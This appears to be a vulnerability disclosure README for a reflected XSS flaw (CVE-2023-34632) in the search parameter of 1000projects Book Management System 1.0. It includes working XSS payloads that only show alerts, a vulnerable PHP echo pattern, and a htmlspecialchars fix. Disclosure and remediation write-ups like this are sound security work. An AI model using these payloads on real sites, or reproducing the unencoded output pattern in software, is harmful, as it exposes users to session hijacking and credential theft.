# CVE-2023-34632
Reflected XSS in 1000projects Book Management System 1.0


<img width="1521" height="845" alt="image" src="https://github.com/user-attachments/assets/ae8f0a5e-016b-4210-bafc-d17c10c49ff1" />

# CVE-2023-34632

**Reflected Cross-Site Scripting (XSS) in 1000projects Book Management System 1.0**

---

## Description

A Reflected Cross-Site Scripting (XSS) vulnerability was discovered in **1000projects Book Management System version 1.0**. The vulnerability exists in the search functionality (`index.php`), where user-supplied input via the `search` parameter is reflected in the HTTP response without proper sanitization or output encoding.

An attacker can craft a malicious URL containing JavaScript code. When a victim clicks the link, the script executes in the context of the victim's browser session, potentially leading to session hijacking, credential theft, or phishing attacks.

---

## Affected Product

| Item | Detail |
|------|--------|
| **Vendor** | 1000projects |
| **Product** | Book Management System |
| **Version** | 1.0 |
| **Component** | `index.php` (search functionality) |
| **Technology** | PHP / MySQL |

---

## Vulnerability Details

| Item | Detail |
|------|--------|
| **CVE ID** | CVE-2023-34632 |
| **Type** | CWE-79: Improper Neutralization of Input During Web Page Generation (Reflected XSS) |
| **Attack Vector** | Network |
| **Attack Complexity** | Low |
| **Privileges Required** | None |
| **User Interaction** | Required (victim clicks crafted URL) |
| **CVSS 3.1 Score** | **6.1 (Medium)** |
| **CVSS Vector** | `CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N` |

---

## Proof of Concept

### Payload

```
http://localhost/book-management/index.php?search="><script>alert('CVE-2023-34632')</script>
```

### Steps to Reproduce

1. Install XAMPP/WAMP and deploy Book Management System 1.0 to the web root
2. Navigate to the application in a browser
3. Enter the following payload in the search box (or visit the crafted URL above):
   ```
   "><script>alert('CVE-2023-34632')</script>
   ```
4. Observe the JavaScript alert popup, confirming the XSS vulnerability

### Screenshot

<!-- Add screenshot image here -->
![XSS PoC](https://github.com/user-attachments/assets/ae8f0a5e-016b-4210-bafc-d17c10c49ff1)

### Alternative Payloads

```html
"><img src=x onerror=alert('CVE-2023-34632')>
```

```html
"><svg/onload=alert('CVE-2023-34632')>
```

---

## Root Cause

The `search` parameter value is directly embedded into the HTML response without any sanitization. The PHP code does not apply `htmlspecialchars()` or equivalent output encoding before rendering user input.

### Vulnerable Code Pattern

```php
// Vulnerable - user input directly rendered in HTML output
$search = $_GET['search'];
echo "Search results for: " . $search;
```

---

## Remediation

Apply proper output encoding to all user-supplied input before rendering in HTML context:

```php
// Fixed - proper output encoding
$search = htmlspecialchars($_GET['search'], ENT_QUOTES, 'UTF-8');
echo "Search results for: " . $search;
```

---

## Impact

- **Session Hijacking** — Attacker can steal session cookies via `document.cookie`
- **Credential Theft** — Fake login forms can be injected to phish user credentials
- **Malware Distribution** — Victims can be redirected to malicious websites
- **Defacement** — Page content can be manipulated in the victim's browser

---

## Timeline

| Date | Event |
|------|-------|
| 2023-06 | Vulnerability discovered |
| 2023-06 | CVE-2023-34632 reserved by MITRE |
| 2026-02 | Public disclosure |

---

## Credit

**Discoverer:** Wonkyeom Kim ([@ssophiz](https://github.com/ssophiz))

---

## References

- [1000projects Book Management System](https://1000projects.org/)
- [CWE-79: Improper Neutralization of Input During Web Page Generation](https://cwe.mitre.org/data/definitions/79.html)
- [OWASP - Cross-Site Scripting (XSS)](https://owasp.org/www-community/attacks/xss/)
